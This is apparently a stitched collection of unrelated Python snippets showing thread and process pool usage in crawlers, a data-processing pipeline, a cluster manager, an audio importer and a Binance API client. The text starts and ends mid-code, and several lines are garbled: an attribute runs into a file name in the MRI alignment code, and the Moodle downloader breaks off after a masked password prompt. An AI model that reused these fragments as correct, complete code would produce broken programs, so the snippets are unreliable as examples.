pool.map(embed, files_batch) pool.close() pool.terminate() pool.join() """
class RenderLocaleBatch(object): """Handles the rendering and threading of the controllers.""" BATCH_DEFAULT_SIZE = 300 # Default number of documents in a batch. def __init__(self, jinja_env, profile, tick=None, batch_size=None): self.batch_size = batch_size or self.BATCH_DEFAULT_SIZE self.jinja_env = jinja_env self.profile = profile self.tick = tick self.batches = [[]] self._is_rendering = False self._results = None self._thread_pool = None def __len__(self): count = 0 for batch in self.batches: count = count + len(batch) return count def _get_batch(self): # Ensure that batch is not over the max size. batch = self.batches[len(self.batches) - 1] if len(batch) >= self.batch_size: self.batches.append([]) batch = self.batches[len(self.batches) - 1] return batch def add(self, controller, *args, **kwargs): """Add an item to be rendered to the batch.""" batch = self._get_batch() batch.append({ 'controller': controller, 'jinja_env': self.jinja_env, 'args': args, 'kwargs': kwargs, }) def render_start(self): """Start the batches rendering.""" self._thread_pool = ThreadPool(len(self.batches)) self._results = self._thread_pool.imap_unordered( render_func, self.batches) self._is_rendering = True def render_finish(self): """Finish in progress batches rendering.""" if not self._is_rendering: raise RenderNotStartedError('Rendering was never started') render_errors = [] rendered_docs = [] for batch_result in self._results: render_errors = render_errors + batch_result.render_errors rendered_docs = rendered_docs + batch_result.rendered_docs if self.tick: for _ in batch_result.render_errors: self.tick() for _ in batch_result.rendered_docs: self.tick() for result in batch_result.rendered_docs: self.profile.add_timer(result.render_timer) self._thread_pool.close() self._thread_pool.join() self._is_rendering = False return rendered_docs, render_errors def render_sync(self): """Syncronous rendering for non-threaded rendering.""" render_errors = [] rendered_docs = [] for batch in self.batches: batch_result = render_func(batch, tick=self.tick) render_errors = render_errors + batch_result.render_errors rendered_docs = rendered_docs + batch_result.rendered_docs return rendered_docs, render_errors
def get_news_feed(tags_for_feed, blocked_news): high_tier = [] low_tier = [] feedsize = 9 tags_for_feed = list(tags_for_feed.items()) random.shuffle(tags_for_feed) tags_for_feed = tags_for_feed[:feedsize] mean = sum(x[1] for x in tags_for_feed) / len(tags_for_feed) if len(tags_for_feed) >= feedsize: for item in tags_for_feed: if item[1] > mean: high_tier.append(item) else: low_tier.append(item) elif len(tags_for_feed) > 0: while len(high_tier) < feedsize: high_tier.append(tags_for_feed[random.randint( 0, len(tags_for_feed) - 1)]) else: return random.shuffle(low_tier) random.shuffle(high_tier) tags_for_feed = high_tier + low_tier start = time.time() pool1 = ThreadPool(len(tags_for_feed)) urls = pool1.map(GetResponses, tags_for_feed) pool1.close() pool1.join() #forming len end = time.time() print("get urls from rss", end - start) urls_to_parse = [] start = time.time() for i in range(len(urls)): res = [i for i in urls[i] if i not in blocked_news] if len(res) > 0: data = dict() data['tag'] = (tags_for_feed[i])[0] data['coef'] = (tags_for_feed[i])[1] data['url'] = res[0] blocked_news.append(res[0]) urls_to_parse.append(data) end = time.time() print("form non repeating dict", end - start) start = time.time() pool2 = ThreadPool(feedsize) results = pool2.map(GetTxt, urls_to_parse) pool2.close() pool2.join() end = time.time() print("parsing news", end - start) SortNewsByInterest(results) results = FormUserFeed(results) return results
def initiate_threads(): _pool = Pool(5) _pool.map(traverse_directory, self.valid_directories) _pool.close() _pool.join()
if not op: print('Unknown operation {}'.format(op_code)) sys.exit(3) op_lists.append(op_list) counter = Counter() thread_pool = Pool(WORKER_COUNT) print('Thread pool initialised with {} worker{}'.format( WORKER_COUNT, '' if WORKER_COUNT == 1 else 's')) matches = [] for dir_info in os.walk(image_dir): dir_name, _, file_names = dir_info print('Processing {}...'.format(dir_name)) for file_name in file_names: if EXTENSION_REGEX.match(file_name): if AUGMENTED_FILE_REGEX.match(file_name): counter.skipped_augmented() else: process(dir_name, file_name, op_lists) else: counter.skipped_no_match() print("Waiting for workers to complete...") thread_pool.close() thread_pool.join() print(counter.get())
class Engine(object): def __init__(self): if settings.IS_DISTRIBUTE: self.collector = RedisStatsCollector() else: self.collector = NormalStatsCollector() self.scheduler = Scheduler(self.collector) # 实例化四个对象 self.spiders = self._auto_import_instances(settings.SPIDERS, isspider=True) # self.scheduler = Scheduler() self.downloader = Downloader() self.pipelines = self._auto_import_instances(settings.PIPELINES) # 实例化中间件 self.spider_mids = self._auto_import_instances( settings.SPIDERS_MIDDLEWARES) self.down_mids = self._auto_import_instances( settings.DOWNLOADER_MIDDLEWARES) # # 记录请求个数和响应个数 # self.total_request_num = 0 # self.total_response_num = 0 # 创建线程池 self.pool = Pool() # 允许递归 self.is_running = True # 动态导包多方法 def _auto_import_instances(self, path=[], isspider=False): '''通过配置文件,动态导入类并实例化 path: 表示配置文件中配置的导入类的路径 isspider: 由于爬虫需要返回的是一个字典,因此对其做对应的判断和处理 ''' instances = {} if isspider else [] for p in path: module_name = p.rsplit(".", 1)[0] # 取出模块名称 cls_name = p.rsplit(".", 1)[1] # 取出类名称 ret = importlib.import_module(module_name) # 动态导入爬虫模块 cls = getattr(ret, cls_name) # 根据类名称获取类对象 if isspider: instances[cls.name] = cls() # 组装成爬虫字典{spider_name:spider(),} else: instances.append(cls()) # 实例化类对象 # 把管道中间件分别组装成 管道列表=[管道类1(),管道类2()] / 中间件列表 = [中间件类1(),中间件类2()] return instances # 返回类对象字典或列表 # 初始化请求对象:入队列 def _start_requests(self): # 1、spider---request--->engine def _func(spider_name, spider): requests = spider.start_requests() for request in requests: # 爬虫中间件---request for spider_mid in self.spider_mids: request = spider_mid.process_request(request) # 给对应的请求对象request绑定自己的爬虫key(可以动态绑定,即为如下) request.spider_name = spider_name # 2、engine---request--->scheduler self.scheduler.add_request(request) # 记录请求对象个数 # self.total_request_num += 1 self.collector.incr(self.collector.request_nums_key) for spider_name, spider in self.spiders.items(): # 让每一个爬虫都异步执行初始化请求对象:入队列 self.pool.apply_async(_func, args={spider_name, spider}) # 出队列:下载数据 def execute_request_response_item(self): # 3、scheduler---request--->engine request = self.scheduler.get_request() # 1、判断对象是否为空。2、跳出死循环 if request is None: return # 下载中间件---resuqest for down_mid in self.down_mids: request = down_mid.process_request(request) # 4、engine---request--->downloader # 5、downloader---response--->engine response = self.downloader.get_response(request) # 将request的meta传递给response中的meta response.meta = request.meta # 下载中间件---response for down_mid in self.down_mids: response = down_mid.process_response(response) # 爬虫中间件---response for spider_mid in self.spider_mids: response = spider_mid.process_response(response) # 6、engine---response--->spider # 使用字典之后,只需要对应解析爬虫名称就能对应解析方法 # 所以之后的爬虫方法不再需要遍历 spider = self.spiders[request.spider_name] # 根据当前爬虫自己的请求对象,生成对应的解析方法,并引用于之后的解析 # for spider in self.spiders: parse = getattr(spider, request.parse) results = parse(response) for result in results: # 7、result---engine判断 if isinstance(result, Request): # 对于新的请求对象也要绑定key result.spider_name = request.spider_name # 如果是request:engine---request--->scheduler # 如果是新请求,需要重新进入爬虫中间件 for spider_mid in self.spider_mids: result = spider_mid.process_request(result) self.scheduler.add_request(result) # 注意点:新的请求对象记录个数 # 因为新的请求对象已经进入了队列,而引擎却没有进行加一的计数 # self.total_request_num += 1 self.collector.incr(self.collector.request_nums_key) else: # 如果是item:engine---item--->pipeline for pipeline in self.pipelines: pipeline.process_item(result, spider) # 记录响应对象个数 # self.total_response_num += 1 self.collector.incr(self.collector.response_nums_key) # 构建进程池中的回调函数:递归 def _callback(self, item): if self.is_running: self.pool.apply_async(self.execute_request_response_item, callback=self._callback, error_callback=self._error_back) # 捕获子线程异常 def _error_back(self, e): # print(e) logger.exception(e) raise e def _start(self): '''调度4个模块''' # 加入线程池 self.pool.apply_async(self._start_requests, error_callback=self._error_back) # 应该手动设置最大并发数 for i in range(5): # 此中的异步方法中,传入的target是一个函数名称而不是一个方法,所以不能在后面加括号 self.pool.apply_async(self.execute_request_response_item, callback=self._callback, error_callback=self._error_back) # 判断多爬虫中,没有增量式的条件 sum_task = sum([spider.time_task for spider in self.spiders.values()]) while True: time.sleep(0.001) # self.pool.apply_async(self.execute_request_response_item()) # 只有当值为0,即为没有增量式才会退出 if sum_task == 0: # 由于异步的问题,所以需要加入条件阻塞 if self.collector.request_nums != 0: # 判断退出条件,爬虫结束 if self.collector.response_nums + self.collector.repeat_request_nums >= self.collector.request_nums: self.is_running = False break self.pool.close() self.pool.join() # 将上面的调度方法变成私有方法,进行嵌套,方便日志记录时间 def start(self): start_time = datetime.now() self._start() end_time = datetime.now() logger.info('this is a distribute spider:{}'.format( settings.IS_DISTRIBUTE)) logger.info('the self_async is {}'.format(settings.ASYNC_TYPE)) logger.info('the spider start at {}'.format(start_time)) logger.info('the spider end in {}'.format(end_time)) logger.info("the request's total is {}".format( self.collector.request_nums)) logger.info("the repetitive request's total is {}".format( self.collector.repeat_request_nums)) logger.info("the response's total is {}".format( self.collector.response_nums)) logger.info('the spider pass with {}'.format( (end_time - start_time).total_seconds())) # 清空redis中记录的个数 self.collector.clear()
g.create_dataset('label_classification', data=classi,dtype=np.uint8) g.close() return data data=[] csv_data = [line.rstrip('\r\n') for line in open('training.csv')] csv_data = csv_data[1:] h5_size = 30000 for c,i in enumerate(range(7, 8)): #int(len(csv_data)/h5_size))): print(i) m = ThreadPool(12) data = m.map(load_image_thread, csv_data[(i*h5_size)+1:(i+1)*h5_size+1]) m.close() images = [x[0] for x in data] reg = [x[1] for x in data] classi = [x[2] for x in data] g = h5py.File("h5/training"+str(i+1)+".hdf5", "w") g.create_dataset('data', data=images,dtype=np.float32) g.create_dataset('label_regression', data=reg,dtype=np.float32) g.create_dataset('label_classification', data=classi,dtype=np.uint8) g.close() ''' reste=len(csv_data)-int(len(csv_data)/h5_size)*h5_size m = ThreadPool(12)
thread.start() for thread in threads: thread.join() except Exception, e: print 'error', str(e) if __name__ == '__main__': # 填写参数:用户名密码 俱乐部ID 和 俱乐部主域名 共多少页(这个选填) username = '******' password = '******' clubid = '1166' host = 'shlunyu' totalPage = 36 opener = login("http://passport.tiyushe.com/?rc=SSO&ra=login&ajax=1", username, password) url = 'http://' + host + '.tiyushe.com/?c=clubmanage&a=member&cid=' + clubid + '&page={0}' childUrl = 'http://' + host + '.tiyushe.com/?c=clubmanage&a=add_member&cid={0}&uid={1}' filename = 'getData.csv' page_pool = ThreadPool(totalPage / 2) page_list = [] for i in range(1, totalPage + 1): u = url.format(i) page_list.append(u) page_pool.map_async(get_list, (page_list)) page_pool.close() page_pool.join()
def colorize(self, col_out_dir, final_out_dir): """ Transforms the individual channels from Pipeline.color_split using the affine/nonlinear transformation parameters from Pipeline.slice_by_slice_alignment() and the nonlinear volumetric transformation parameters from Pipeline.blockface_to_MRI_alignment() Because each transformation is independent of the others, the script will utilize all threads provided by the user to transform multiple slices simultaneously. See Transform_Wrapper for more information and the transformation code. """ #Feed transformation information to sub-processes through Transform_Wrapper out_suf_list = ['Blue', 'Green', 'Red'] skip_flag = False for i, col_vol in enumerate([ self.hist_NIFTI.Blue_vol, self.hist_NIFTI.Green_vol, self.hist_NIFTI.Red_vol ]): for j in range(len(self.hist_NIFTI.slices)): if not os.path.isfile(self.orig_slice_by_slice_loc + '/color/' + out_suf_list[i] + '/' + col_vol.slices[j].name): break else: continue break else: print( ' - All Color Channel Split Transformed Files Exist. Utilizing currently existing data.' ) skip_flag = True if skip_flag == False: print( '====================================ATTEMPTING TO MULTITHREAD====================================' ) pool = Pool(processes=self.threads) self.hist_NIFTI.Blue_vol.col = 'Blue' self.hist_NIFTI.Green_vol.col = 'Green' self.hist_NIFTI.Red_vol.col = 'Red' for col_vol in enumerate([ self.hist_NIFTI.Blue_vol, self.hist_NIFTI.Green_vol, self.hist_NIFTI.Red_vol ]): pool.map( Transform_Wrapper( col_vol, self.hist_transform, self.BF_NIFTI, self.orig_slice_by_slice_loc + '/color/'), list(range(len(self.hist_transform.slices)))) pool.close() pool.join() #Load output color channel split Stacks and convert to volume/ tmp = self.BF_NIFTI r = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/color/Red/') r.affine_3D = tmp.affine_3D r.volumize(self.orig_slice_by_slice_loc + '/color/volumes/r_vol.nii.gz') g = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/color/Green/') g.affine_3D = tmp.affine_3Dblockface_to_MRI_alignment.nii.gz g.volumize(self.orig_slice_by_slice_loc + '/color/volumes/g_vol.nii.gz') b = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/color/Blue/') b.affine_3D = tmp.affine_3D b.volumize(self.orig_slice_by_slice_loc + '/color/volumes/b_vol.nii.gz') #Transform color-split volumes to the MRI space self.final_apply_transform( self.orig_slice_by_slice_loc + '/color/volumes/b_vol.nii.gz', self.orig_slice_by_slice_loc + '/color/volumes/final_b_vol.nii.gz') self.final_apply_transform( self.orig_slice_by_slice_loc + '/color/volumes/g_vol.nii.gz', self.orig_slice_by_slice_loc + '/color/volumes/final_g_vol.nii.gz') self.final_apply_transform( self.orig_slice_by_slice_loc + '/color/volumes/r_vol.nii.gz', self.orig_slice_by_slice_loc + '/color/volumes/final_r_vol.nii.gz') #Load transformed and color-split volumes. Merge the channels to create and RGB volume. print('Loading RGB') r_data = nib.load(self.orig_slice_by_slice_loc + '/color/volumes/final_r_vol.nii.gz').get_data() g_data = nib.load(self.orig_slice_by_slice_loc + '/color/volumes/final_g_vol.nii.gz').get_data() b_data = nib.load(self.orig_slice_by_slice_loc + '/color/volumes/final_b_vol.nii.gz').get_data() print('Merging Channels') rgb = np.empty((r_data.shape[0], r_data.shape[1], r_data.shape[2], 3)) rgb[:, :, :, 0] = b_data rgb[:, :, :, 1] = g_data rgb[:, :, :, 2] = r_data rgb = rgb.astype('u1') #Save the RGB Volume print('Saving Volume') shape_3d = rgb.shape[0:3] rgb_dtype = np.dtype([('R', 'u1'), ('G', 'u1'), ('B', 'u1')]) rgb_typed = rgb.view(rgb_dtype).reshape(shape_3d) tmp = nib.load(self.MRI) volume = nib.Nifti1Image(rgb_typed, affine=tmp.affine) nib.save(volume, final_out_dir + '/RGB_aligned_histology_vol.nii.gz')
def main(): # configure the program to use utf8 encoding reload(sys) sys.setdefaultencoding('utf8') print "#### Welcome to the MoodleDownloader!\n" sUsername = raw_input("Enter you username: "******"\n\n"
def start(self): """ Starts the cluster with the properties given in the constructor. It will create the nodes through the configurator and delegate all the work to them. After the identifiers of all instances are available, it will save the cluster through the cluster storage. """ # To not mess up the cluster management we start the nodes in a # different thread. In this case the main thread receives the sigint # and communicates to the `start_node` thread. The nodes to work on # are passed in a managed queue. self.keep_running = True def sigint_handler(signal, frame): """ Makes sure the cluster is stored, before the sigint results in exiting during the node startup. """ log.error("user interruption: saving cluster before exit.") self.keep_running = False nodes = self.get_all_nodes() thread_pool = Pool(processes=len(nodes)) log.debug("Created pool of %d threads" % len(nodes)) signal.signal(signal.SIGINT, sigint_handler) # This is blocking result = thread_pool.map_async(self._start_node, nodes) while not result.ready(): result.wait(1) if not self.keep_running: # the user did abort the start of the cluster. We finish the # current start of a node and save the status to the # storage, so we don't have not managed instances laying # around log.error("Aborting upon Ctrl-C") thread_pool.close() thread_pool.join() self._storage.dump_cluster(self) sys.exit(1) # dump the cluster here, so we don't loose any knowledge self._storage.dump_cluster(self) signal.alarm(0) def sigint_reset(signal, frame): sys.exit(1) signal.signal(signal.SIGINT, sigint_reset) # check if all nodes are running, stop all nodes if the # timeout is reached def timeout_handler(signum, frame): raise TimeoutError( "problems occured while starting the nodes, " "timeout `%i`", Cluster.startup_timeout) signal.signal(signal.SIGALRM, timeout_handler) signal.alarm(Cluster.startup_timeout) starting_nodes = self.get_all_nodes() try: while starting_nodes: starting_nodes = [ n for n in starting_nodes if not n.is_alive() ] if starting_nodes: time.sleep(10) except TimeoutError as timeout: log.error("Not all nodes were started correctly within the given" " timeout `%s`" % Cluster.startup_timeout) for node in starting_nodes: log.error("Stopping node `%s`, since it could not start " "within the given timeout" % node.name) node.stop() self.remove_node(node) signal.alarm(0) # If we reached this point, we should have IP addresses for # the nodes, so update the storage file again. self._storage.dump_cluster(self) # Try to connect to each node. Run the setup action only when # we successfully connect to all of them. signal.signal(signal.SIGALRM, timeout_handler) signal.alarm(Cluster.startup_timeout) pending_nodes = self.get_all_nodes()[:] try: while pending_nodes: for node in pending_nodes[:]: if node.connect(): log.info("Connection to node %s (%s) successful.", node.name, node.ip_public) pending_nodes.remove(node) if pending_nodes: time.sleep(5) except TimeoutError: # remove the pending nodes from the cluster log.error("Could not connect to all the nodes of the " "cluster within the given timeout `%s`." % Cluster.startup_timeout) for node in pending_nodes: log.error("Stopping node `%s`, since we could not connect to" " it within the timeout." % node.name) node.stop() self.remove_node(node) signal.alarm(0) # A lot of things could go wrong when starting the cluster. To # ensure a stable cluster fitting the needs of the user in terms of # cluster size, we check the minimum nodes within the node groups to # match the current setup. self._check_cluster_size()
def start_pipeline(self): """ Defines the steps and order of the pipeline. Only call from Pipeline.run() to avoid errors. """ mark = '=================================' print(mark, '\nSTEP 0: GENERATING OUTPUT DIRECTORIES\n', mark) self.gen_directory_struct() print(mark, 'STEP 1:PREPROCESSING', mark) self.orig_MRI = self.MRI self.preprocess_histology() self.preprocess_blockface() self.preprocess_MRI() print(mark, '\nSTEP 2:RESAMPLING (OPTIONAL)\n', mark) #Resample data if self.resolution_level is not 'MRI': self.MRI_path += 'resampled_' if self.resolution_level == 'histology': skip_flag = False #Match the resolution of histology if self.overwrite == False and os.path.isfile( self.MRI_path + os.path.split(self.orig_MRI)[1]): print( ' - {} Already Exists. Utilizing currently existing data.'. format(self.MRI_path + os.path.split(self.orig_MRI)[1])) self.MRI = self.MRI_path + os.path.split(self.orig_MRI)[1] else: self.resample(self.MRI, self.MRI_path + os.path.split(self.orig_MRI)[1], self.histology.pix_dim, self.histology.affine_3D, 3) self.MRI = self.MRI_path + os.path.split(self.orig_MRI)[1] if self.overwrite == False: for slice in self.BF_NIFTI.slices: if not os.path.isfile( self.orig_bf_loc + "/NIFTI/resampled/{}".format(slice.name)): break else: print( ' - All Resampled Blockface NIFTI Files Exist. Utilizing currently existing data.' ) self.BF_NIFTI.rename(self.orig_bf_loc + "/NIFTI/resampled/") self.BF_NIFTI.affine_3D = self.hist_NIFTI.affine_3D skip_flag = True if skip_flag == False: for slice in self.BF_NIFTI.slices: self.resample( slice.path, self.orig_bf_loc + "/NIFTI/resampled/{}".format(slice.name), self.histology.pix_dim, self.histology.affine_3D, 2) self.BF_NIFTI.rename(self.orig_bf_loc + "/NIFTI/resampled/") self.BF_NIFTI.affine_3D = self.hist_NIFTI.affine_3D elif self.resolution_level == 'blockface': #Match the resolution of ng if self.overwrite == False and os.path.isfile( self.MRI_path + os.path.split(self.orig_MRI)[1]): print( ' - {} Already Exists. Utilizing currently existing data.'. format(self.MRI_path + os.path.split(self.orig_MRI)[1])) else: self.resample(self.MRI, self.MRI_path + os.path.split(self.orig_MRI)[1], self.bf.pix_dim, self.histology.affine_3D, 3) self.MRI = self.MRI_path + os.path.split(self.orig_MRI)[1] print(mark, '\nSTEP 3:ALIGNMENT\n', mark) self.slice_by_slice_alignment(self.threads, self.orig_slice_by_slice_loc) self.blockface_to_MRI_alignment(self.orig_bf_loc + "/volume/aligned_to_MRI") self.orig_hist_NIFTI.col = 'gray' pool = Pool(processes=self.threads) pool.map( Transform_Wrapper(self.orig_hist_NIFTI, self.hist_transform, self.BF_NIFTI, self.orig_slice_by_slice_loc), list(range(len(self.hist_transform.slices)))) pool.close() pool.join() hist_vol = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/gray', '*.nii.gz', self.hist_NIFTI.affine_3D) hist_vol.volumize(self.final_out + '/hist_to_bf.nii.gz') self.final_apply_transform(self.final_out + '/hist_to_bf.nii.gz', self.final_out + '/hist_to_MRI.nii.gz') if self.color == True: print(mark, '\nSTEP 4:COLORIZATION\n', mark) self.colorize(self.orig_col_split_loc, self.final_out) print('Done!')
def parallelCrawling(url): threadPool = Pool(12) threadPool.map(download, nextURL(url)) threadPool.close() threadPool.join()
def product_main(): try: sys.path.append(os.getcwd()) from info import link, cat, large, small print 'imported data from info' sys.path.remove(os.getcwd()) except: print 'lack of info.py' exit(0) #path = raw_input('the PATH of file contains a single string of the url link: ') #with open(path) as fh: # link = fh.read() cpu = int(raw_input('(multi-processing) how many process to run ? ')) #cat = [10020, 10021, 10010, 10001, 10003, 10006, 10019, 10008, 10009, 10011, 10013, \ # 10023, 10022, 10015, 10012, 10007, 10017, 10018] #large = [19, 1, 17, 9, 10, 11, 23, 18, 15, 16, 12, 22, 13, 6] #small = [25, 27, 14, 3, 2, 556, 8, 20, 31, 7, 21, 4, 24, 28, 5, 32, 30, 33, 29, 561, 560, 34] try: from info import link, cat, large, small print 'imported data from info' except: print 'lack of info.py' exit(0) swim = [] for i in small: swim.append((link, i, 0)) for p in large: for c in cat: swim.append((link, p, c)) print "combinations: "+str(len(swim)) start=time() pool = ThreadPool(cpu) results = pool.map(helper, swim) pool.close() pool.join() end = time() elapse = end - start print 'used {:.2f} s, {:.2f} mins'.format(elapse, elapse/60) print 'start concating data' ct = ctime().split() path = ct[2]+ct[1]+ct[-1]+'_product/' files = os.listdir(path) len(files) df = pd.concat([pd.read_excel(path + i) for i in files]) print df.shape print 'removing duplicates' col = list(df.columns) col = [col.pop(col.index('pid')), col.pop(col.index('title'))]+col df = df[col] df = df.reset_index(drop=True) df = df.loc[df['pid'].drop_duplicates().index,:] print df.shape print 'saving to products.xlsx' df.to_excel(strftime("%Y-%m-%d-%H-%M",localtime())+ ' Products.xlsx', encoding='utf-8', index=False) print 'done!', ctime()
def _maybe_convert_set(input_tsv, audio_dir, label_filter, space_after_every_character=None): output_csv = path.join(audio_dir, os.path.split(input_tsv)[-1].replace('tsv', 'csv')) print("Saving new DeepSpeech-formatted CSV file to: ", output_csv) # Get audiofile path and transcript for each sentence in tsv samples = [] with open(input_tsv, encoding='utf-8') as input_tsv_file: reader = csv.DictReader(input_tsv_file, delimiter='\t') for row in reader: samples.append((row['path'], row['sentence'])) # Keep track of how many samples are good vs. problematic counter = { 'all': 0, 'failed': 0, 'invalid_label': 0, 'too_short': 0, 'too_long': 0, 'total_time': 0 } lock = RLock() num_samples = len(samples) rows = [] def one_sample(sample): """ Take a audio file, and optionally convert it to 16kHz WAV """ mp3_filename = path.join(audio_dir, sample[0]) if not path.splitext(mp3_filename.lower())[1] == '.mp3': mp3_filename += ".mp3" # Storing wav files next to the mp3 ones - just with a different suffix wav_filename = path.splitext(mp3_filename)[0] + ".wav" _maybe_convert_wav(mp3_filename, wav_filename) file_size = -1 frames = 0 if path.exists(wav_filename): file_size = path.getsize(wav_filename) frames = int( subprocess.check_output(['soxi', '-s', wav_filename], stderr=subprocess.STDOUT)) label = label_filter(sample[1]) with lock: if file_size == -1: # Excluding samples that failed upon conversion counter['failed'] += 1 elif label is None: # Excluding samples that failed on label validation counter['invalid_label'] += 1 elif int(frames / SAMPLE_RATE * 1000 / 10 / 2) < len(str(label)): # Excluding samples that are too short to fit the transcript counter['too_short'] += 1 elif frames / SAMPLE_RATE > MAX_SECS: # Excluding very long samples to keep a reasonable batch-size counter['too_long'] += 1 else: # This one is good - keep it for the target CSV rows.append( (os.path.split(wav_filename)[-1], file_size, label)) counter['all'] += 1 counter['total_time'] += frames print("Importing mp3 files...") pool = Pool(cpu_count()) bar = progressbar.ProgressBar(max_value=num_samples, widgets=SIMPLE_BAR) for i, _ in enumerate(pool.imap_unordered(one_sample, samples), start=1): bar.update(i) bar.update(num_samples) pool.close() pool.join() with open(output_csv, 'w', encoding='utf-8') as output_csv_file: print('Writing CSV file for DeepSpeech.py as: ', output_csv) writer = csv.DictWriter(output_csv_file, fieldnames=FIELDNAMES) writer.writeheader() bar = progressbar.ProgressBar(max_value=len(rows), widgets=SIMPLE_BAR) for filename, file_size, transcript in bar(rows): if space_after_every_character: writer.writerow({ 'wav_filename': filename, 'wav_filesize': file_size, 'transcript': ' '.join(transcript) }) else: writer.writerow({ 'wav_filename': filename, 'wav_filesize': file_size, 'transcript': transcript }) print('Imported %d samples.' % (counter['all'] - counter['failed'] - counter['too_short'] - counter['too_long'])) if counter['failed'] > 0: print('Skipped %d samples that failed upon conversion.' % counter['failed']) if counter['invalid_label'] > 0: print('Skipped %d samples that failed on transcript validation.' % counter['invalid_label']) if counter['too_short'] > 0: print( 'Skipped %d samples that were too short to match the transcript.' % counter['too_short']) if counter['too_long'] > 0: print('Skipped %d samples that were longer than %d seconds.' % (counter['too_long'], MAX_SECS)) print('Final amount of imported audio: %s.' % secs_to_hours(counter['total_time'] / SAMPLE_RATE))
def _thread(hs, cs, n): pool = Pool(n) ret = pool.map(hs, cs) pool.close() pool.join() return ret
def downloadFiles(self, directory = None, maxRetries = 5, multiproc = False, numproc = 3, overwrite = False): """Download URLs. TODO ---- - overwrite parameter: to be able to skip or overwrite existing files - write urls of failed downloads to file? Parameters ---------- directory: str Base directory where to save files maxRetries: int Maximum number of retrys to open the url multiproc: boolean Download multiple files at the same time. numproc: int optional Number of processes if multiproc is set to True overwrite: boolean Should existing files be overwritten? Return ------ """ directory = self.targetDir def pathTuple(url, directory = directory): secfield = os.path.basename(url).split(".")[1] year = secfield[1:5] outdir = os.path.join(directory, year) return((url, outdir)) def download(itemtuple): #unpack tuple url = itemtuple[0] directory = itemtuple[1] fname = os.path.basename(url) fpath = os.path.join(directory, fname) attempts = 0 if not os.path.isfile(fpath): while attempts < maxRetries: try: response = urllib2.urlopen(url) with open(fpath, "wb") as f: f.write(response.read()) break except urllib2.URLError as e: logger.debug(e) logger.debug("File {0} failed to download with the above error".format(url)) if attempts == maxRetries -1: with open("download_failed.txt", "w") as f: f.write(url + "\n") attempts += 1 pass #update progressbar pbar.update(1) return try: if directory is not None: self.pathList = list(map(pathTuple, self.fileURLs)) else: raise TypeError except TypeError: print("""No target directory were to store files given. Instantiate search obejct with directory or set the directory parameter of downloadFiles.""") #create year directories separate to avoid race condition when #using it in the download function itself and multiprocessing enabled for d in set([x[1] for x in self.pathList]): #check if fpath exists. create if necessary if not os.path.exists(d): os.makedirs(d) msg = "Starting download of files..." logger.info(msg) #print(msg) pbar = tqdm(total = len(self.pathList)) if multiproc: p = Pool(numproc) p.map(download, self.pathList) p.close() p.join() else: map(download, self.pathList) pbar.close() #check if file was downloaded correctly else download again pass
def get_all(codes, f): print type(codes) pool = ThreadPool(40) pool.map(f, codes) pool.close() pool.join()
'''遍历稿件tag''' #!/usr/bin/python # -*- coding: utf-8 -*- from multiprocessing.dummy import Pool as ThreadPool from bilisupport import AVTAGLIST, ERRORLIST, API_TAG import requests def gettag(aid): '''获取稿件tag''' if not aid: return 404 aid = int(aid) aidparams = {'aid': aid, 'jsonp': 'jsonp'} info = requests.get(url=API_TAG, params=aidparams).json() if info.get('code') == 0: tags = [{'aid': aid, 'tag': x.get('tag_id')} for x in info.get('data')] AVTAGLIST.insert_many(tags) print(aid) else: ERRORLIST.insert_one(info) if __name__ == '__main__': MULTIPOOL = ThreadPool(8) for avid in open('videoaid.csv', 'r'): MULTIPOOL.apply_async(gettag, (avid, )) MULTIPOOL.close() MULTIPOOL.join()
class BinanceApi(object): """""" ################################################### ## Basic Function ################################################### #---------------------------------------------------------------------- def __init__(self): """Constructor""" self.apiKey = '' self.secretKey = '' self.active = False self.reqid = 0 self.queue = Queue() self.pool = None self.headers = {} self.secret = '' self.recvWindow = 5000 self.dataStreamNameList = [] self.dataStreamUrl = '' self.dataStreamActive = False self.dataStreamWs = None self.dataStreamThread = None self.userStreamKey = '' self.userStreamUrl = '' self.userStreamActive = False self.userStreamWs = None self.userStreamThread = None self.keepaliveCount = 0 self.keepaliveThread = None #---------------------------------------------------------------------- def init(self, apiKey, secretKey, recvWindow=5000): """""" self.apiKey = apiKey self.secretKey = secretKey self.headers['X-MBX-APIKEY'] = apiKey self.secret = bytes(secretKey.encode('utf-8')) self.recvWindow = recvWindow #---------------------------------------------------------------------- def start(self, n=10): """""" if self.active: return self.active = True self.pool = Pool(n) self.pool.map_async(self.run, range(n)) #---------------------------------------------------------------------- def close(self): """""" self.active = False if self.pool: self.pool.close() self.pool.join() #---------------------------------------------------------------------- def request(self, method, path, params=None, signed=False, stream=False): """""" if not signed: url = REST_ENDPOINT + path headers = {} else: if not stream: params['recvWindow'] = self.recvWindow params['timestamp'] = int(time() * 1000) query = parse.urlencode(sorted(params.items())) signature = hmac.new(self.secret, query.encode('utf-8'), hashlib.sha256).hexdigest() query += "&signature={}".format(signature) url = REST_ENDPOINT + path + '?' + query params = None # 参数添加到query中后,清空参数字典 else: if params: query = parse.urlencode(sorted(params.items())) url = REST_ENDPOINT + path + '?' + query params = None else: url = REST_ENDPOINT + path headers = self.headers try: resp = requests.request(method, url, params=params, headers=headers) if resp.status_code == 200: return True, resp.json() else: error = { 'method': method, 'params': params, 'code': resp.status_code, 'msg': resp.json()['msg'] } return False, error except Exception as e: error = { 'method': method, 'params': params, 'code': e, 'msg': traceback.format_exc() } return False, error #---------------------------------------------------------------------- def addReq(self, method, path, params, callback, signed=False, stream=False): """添加请求""" self.reqid += 1 req = (method, path, params, callback, signed, stream, self.reqid) self.queue.put(req) return self.reqid #---------------------------------------------------------------------- def processReq(self, req): """""" method, path, params, callback, signed, stream, reqid = req result, data = self.request(method, path, params, signed, stream) if result: callback(data, reqid) else: self.onError(data, reqid) #---------------------------------------------------------------------- def run(self, n): """""" while self.active: try: req = self.queue.get(timeout=1) self.processReq(req) except Empty: pass ################################################### ## REST Function ################################################### #---------------------------------------------------------------------- def queryPing(self): """""" path = '/api/v1/ping' return self.addReq('GET', path, {}, self.onQueryPing) #---------------------------------------------------------------------- def queryTime(self): """""" path = '/api/v1/time' return self.addReq('GET', path, {}, self.onQueryTime) #---------------------------------------------------------------------- def queryExchangeInfo(self): """""" path = '/api/v1/exchangeInfo' return self.addReq('GET', path, {}, self.onQueryExchangeInfo) #---------------------------------------------------------------------- def queryDepth(self, symbol, limit=0): """""" path = 